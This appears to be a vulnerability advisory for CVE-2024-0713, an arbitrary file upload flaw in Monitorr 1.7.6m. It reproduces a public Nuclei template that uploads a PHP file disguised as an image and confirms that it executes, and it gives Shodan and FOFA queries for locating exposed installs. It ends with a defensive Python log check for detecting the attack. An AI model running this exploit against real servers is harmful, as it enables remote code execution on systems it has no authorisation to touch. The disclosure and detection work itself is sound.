CVE-2024-0713: Monitorr Services Configuration - Arbitrary File Upload

Date: 2025-08-01 | Affected software: Monitorr Services Configuration | PoC: Public

Vulnerability Description

A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

PoC Code [Public]

id: CVE-2024-0713

info:
  name: Monitorr Services Configuration - Arbitrary File Upload
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://github.com/Tropinene/Yscanner
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-0713
    cwe-id: CWE-434
    epss-score: 0.00061
    epss-percentile: 0.2356
    cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: monitorr
    product: monitorr
    shodan-query: http.favicon.hash:"-211006074"
    fofa-query: "icon_hash=\"-211006074\""
  tags: cve,cve2024,file-upload,intrusive,monitorr
variables:
  file: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /assets/php/upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn

        ------WebKitFormBoundaryaquxwjsn
        Content-Disposition: form-data; name="fileToUpload"; filename="{{file}}.php"
        Content-Type: image/jpeg

        {{base64_decode('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')}}
        ------WebKitFormBoundaryaquxwjsn--

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - "has been uploaded to:"

  - raw:
      - |
        GET /assets/data/usrimg/{{file}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "atfersotg"

      - type: status
        status:
          - 200
# digest: 490a0046304402204750d427ea44f6f9a9a117c70f83393a9fcaa21c4b5fe4b7c1d2306540d1b53c0220191d75f5bd47157776297ea14d82aeaa567cfe770bbc3fbe726c428bbc06e983:922c64590222798bb761d5b6d8e72950
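
For defenders, the two requests in the template leave a recognisable trace in web server logs: a POST to /assets/php/upload.php followed by a request for a script file under /assets/data/usrimg/, a directory that should only ever hold images. The following log check is an added example, not part of the template or of Monitorr; it assumes combined-format access logs, and the extension list and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the template above; the combined log format is an assumption.
UPLOAD_ENDPOINT = "/assets/php/upload.php"
UPLOAD_DIR = "/assets/data/usrimg/"
# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.IGNORECASE)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_suspicious(lines):
    """Flag script requests under the upload dir; note whether the same client
    uploaded successfully earlier and whether the server actually served the file."""
    uploaders = set()
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = unquote(m["uri"].split("?", 1)[0])  # drop query string, decode %xx
        if method == "POST" and path == UPLOAD_ENDPOINT and status == 200:
            uploaders.add(ip)
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            findings.append({
                "ip": ip, "time": m["ts"], "path": path, "status": status,
                "preceded_by_upload": ip in uploaders,
                "served": status == 200,
            })
    return findings

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "POST /assets/php/upload.php HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "GET /assets/data/usrimg/qwert.php HTTP/1.1" 200 9 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Aug/2025:10:05:00 +0000] "GET /assets/data/usrimg/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Aug/2025:10:06:00 +0000] "GET /assets/data/usrimg/test.PHP?x=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

A finding with both `preceded_by_upload` and `served` set matches the full sequence the template performs; a 404 on a script path under the upload directory is still worth reviewing as probing.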
